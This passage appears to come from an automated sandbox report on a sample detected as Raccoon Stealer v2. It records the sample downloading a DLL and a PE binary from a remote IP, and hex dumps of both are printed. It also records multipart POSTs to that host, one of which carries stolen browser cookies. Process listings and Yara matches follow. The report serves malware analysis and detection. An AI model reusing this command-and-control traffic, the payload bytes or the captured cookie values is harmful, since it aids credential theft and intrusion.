00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 a1 0c 9a 03 10 85 c0 74 0f 8b 88 8c 02 00 00 ff 15 00 a0 03 10 5d ff e1 68 a0 36 00 10 68 14 9a 03 10 ff 15 e8 7b 03 10 83 c4 08 85
                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL'9b"!@AtvSw5hqD{.textV `.rdata@@.data~@.00cfg@@.rsrc@@.reloc56@BUt]h6h{
                                      Aug 5, 2022 13:54:23.897089005 CEST13476OUTGET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1
                                      Content-Type: text/plain;
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:23.949541092 CEST13477INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:23 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 1099223
                                      Connection: keep-alive
                                      Last-Modified: Mon, 11 Apr 2022 12:28:56 GMT
                                      ETag: "62541f08-10c5d7"
                                      Accept-Ranges: bytes
                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 70 0e 00 00 2e 00 00 00 f8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 a0 0e 00 00 0c 00 00 00 26 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 b0 0e 00 00 04 00 00 00 32 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 c0 0e 00 00 3c 00 00 00 36 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL",bv! a n* ;.text`P`.data|' (@`.rdataDPF:@`@.bss(`.edatan*,@0@.idata@0.CRT,@0.tls @0.rsrc@0.reloc; <@0B/48`@@B/19Rp@B/31]'@(@B/45-p.@B/57\&@0B/70#2@B/81s:<6@B/92P
                                      Aug 5, 2022 13:54:25.544966936 CEST14636OUTPOST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1
                                      Accept: */*
                                      Content-Type: multipart/form-data; boundary=vuZP5ZW3D12Zo8G4
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Content-Length: 7421
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:25.621562004 CEST14645INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:25 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 8
                                      Connection: keep-alive
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                      Data Raw: 72 65 63 65 69 76 65 64
                                      Data Ascii: received
                                      Aug 5, 2022 13:54:26.529094934 CEST14646OUTPOST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1
                                      Accept: */*
                                      Content-Type: multipart/form-data; boundary=7p5ysQ91wEB9Uu5W
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Content-Length: 597
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 2d 2d 37 70 35 79 73 51 39 31 77 45 42 39 55 75 35 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5c 63 6f 6f 6b 69 65 73 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6f 62 6a 65 63 74 0d 0a 0d 0a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 52 55 45 09 2f 09 54 52 55 45 09 31 33 32 36 31 37 33 35 37 39 35 31 36 34 37 34 30 09 4e 49 44 09 64 6a 45 77 69 56 77 36 6d 31 56 65 56 73 7a 47 46 49 34 30 35 72 71 45 36 69 42 6c 6d 6b 74 6c 65 72 61 51 7a 74 70 45 45 41 65 41 63 61 77 5a 77 31 4a 34 38 4f 70 5a 50 49 74 54 76 67 4d 53 50 34 63 48 33 71 45 71 75 43 33 55 47 4c 52 53 71 74 69 43 52 39 47 4a 59 35 78 4b 75 67 79 41 68 63 50 4e 32 52 37 62 67 5a 52 61 67 54 52 45 7a 71 35 67 6f 57 33 4f 46 58 43 79 6f 67 68 6f 42 61 32 4e 47 50 55 48 64 74 74 43 73 6e 43 71 48 69 65 6a 47 42 46 39 66 6b 76 45 77 54 59 4b 6d 49 34 46 76 54 64 71 6f 35 6e 2b 70 58 43 62 7a 47 52 57 38 66 6c 69 4b 49 51 34 47 6e 46 67 55 48 6f 2f 35 74 44 65 58 65 46 43 30 5a 2f 46 30 55 71 75 74 53 42 49 34 49 2b 37 4a 65 6e 2b 51 6c 6c 62 77 55 59 79 31 44 4c 6a 44 45 30 48 33 45 37 53 78 6c 53 6f 53 6f 58 53 67 32 4b 41 2f 46 74 6f 7a 4d 42 4b 49 64 34 62 79 56 5a 78 6b 79 59 3d 0a 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 5c 44 65 66 61 75 6c 74 7c 78 39 54 61 76 79 70 41 47 54 42 75 7a 39 66 75 55 45 35 4a 66 67 4e 76 6c 45 2b 72 74 2b 2b 6c 32 4f 37 7a 54 53 76 51 57 55 45 3d 7c 38 35 2e 30 2e 34 31 38 33 2e 31 32 31 2d 36 34 0d 0a 0d 0a 2d 2d 37 70 35 79 73 51 39 31 77 45 42 39 55 75 35 57 2d 2d
                                      Data Ascii: --7p5ysQ91wEB9Uu5WContent-Disposition: form-data; name="file"; filename="\cookies.txt"Content-Type: application/x-object.google.comTRUE/TRUE13261735795164740NIDdjEwiVw6m1VeVszGFI405rqE6iBlmktleraQztpEEAeAcawZw1J48OpZPItTvgMSP4cH3qEquC3UGLRSqtiCR9GJY5xKugyAhcPN2R7bgZRagTREzq5goW3OFXCyoghoBa2NGPUHdttCsnCqHiejGBF9fkvEwTYKmI4FvTdqo5n+pXCbzGRW8fliKIQ4GnFgUHo/5tDeXeFC0Z/F0UqutSBI4I+7Jen+QllbwUYy1DLjDE0H3E7SxlSoSoXSg2KA/FtozMBKId4byVZxkyY=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default|x9TavypAGTBuz9fuUE5JfgNvlE+rt++l2O7zTSvQWUE=|85.0.4183.121-64--7p5ysQ91wEB9Uu5W--
                                      Aug 5, 2022 13:54:26.601373911 CEST14647INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:26 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 8
                                      Connection: keep-alive
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                      Data Raw: 72 65 63 65 69 76 65 64
                                      Data Ascii: received
                                      Aug 5, 2022 13:54:28.059319019 CEST14650OUTPOST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1
                                      Accept: */*
                                      Content-Type: multipart/form-data; boundary=L0zZl9hiqF02yJ84
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Content-Length: 7135
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:28.123226881 CEST14660INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:28 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 8
                                      Connection: keep-alive
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                      Data Raw: 72 65 63 65 69 76 65 64
                                      Data Ascii: received
                                      Aug 5, 2022 13:54:28.133527040 CEST14661OUTPOST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1
                                      Accept: */*
                                      Content-Type: multipart/form-data; boundary=f8gayI5MWfrI48MR
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Content-Length: 7147
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:28.193248034 CEST14669INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:28 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 8
                                      Connection: keep-alive
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                      Data Raw: 72 65 63 65 69 76 65 64
                                      Data Ascii: received
                                      Aug 5, 2022 13:54:28.198246002 CEST14669OUTPOST /b6425a6ca38e36b1a195f6f3019a4b0a HTTP/1.1
                                      Accept: */*
                                      Content-Type: multipart/form-data; boundary=8sc6O1CFgD9wm6aq
                                      User-Agent: record
                                      Host: 51.195.166.178
                                      Content-Length: 3565
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Aug 5, 2022 13:54:28.258095026 CEST14674INHTTP/1.1 200 OK
                                      Server: nginx/1.14.0 (Ubuntu)
                                      Date: Fri, 05 Aug 2022 11:54:28 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 8
                                      Connection: keep-alive
                                      Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Resource-Policy: same-origin
                                      X-DNS-Prefetch-Control: off
                                      Expect-CT: max-age=0
                                      X-Frame-Options: SAMEORIGIN
                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                      X-Download-Options: noopen
                                      X-Content-Type-Options: nosniff
                                      Origin-Agent-Cluster: ?1
                                      X-Permitted-Cross-Domain-Policies: none
                                      Referrer-Policy: no-referrer
                                      X-XSS-Protection: 0
                                      ETag: W/"8-OEKKaYqxIiVAaA56t44dc56a/Rw"
                                      Data Raw: 72 65 63 65 69 76 65 64
                                      Data Ascii: received


                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:13:52:19
                                      Start date:05/08/2022
                                      Path:C:\Users\user\Desktop\KbqArOlW06.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\KbqArOlW06.exe"
                                      Imagebase:0x720000
                                      File size:12978176 bytes
                                      MD5 hash:005297E7C0D555822B5A6F31FCDC7661
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.264598811.000000001DAA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.271980164.0000000026172000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.275645439.0000000036F02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.235992777.00000000166BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.236293949.000000001675D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.235782523.000000001666D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.244960789.00000000179E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.236963971.000000001689D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.285645229.000000004EF02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.235724819.000000001662F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000000.00000003.237949559.0000000016B1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Target ID:16
                                      Start time:13:53:58
                                      Start date:05/08/2022
                                      Path:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
                                      Imagebase:0x9a0000
                                      File size:762660256 bytes
                                      MD5 hash:881CBC2DA4C6467AEC519F4909371AF8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.491962653.0000000001250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.491186607.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.474319850.0000000001251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000002.507099567.000000000122A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.469967022.0000000001253000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.492733952.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.477408811.0000000001251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000010.00000003.465053520.0000000001259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Target ID:21
                                      Start time:13:54:08
                                      Start date:05/08/2022
                                      Path:C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                                      Imagebase:0x400000
                                      File size:593460 bytes
                                      MD5 hash:B184AD382E1729FEEA1E7BB94307930F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      General

                                      Target ID:22
                                      Start time:13:54:12
                                      Start date:05/08/2022
                                      Path:C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
                                      Imagebase:0x400000
                                      File size:772608 bytes
                                      MD5 hash:D8467CA1F529C6C6DECB1B82DBAED1DF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      Disassembly

                                      No disassembly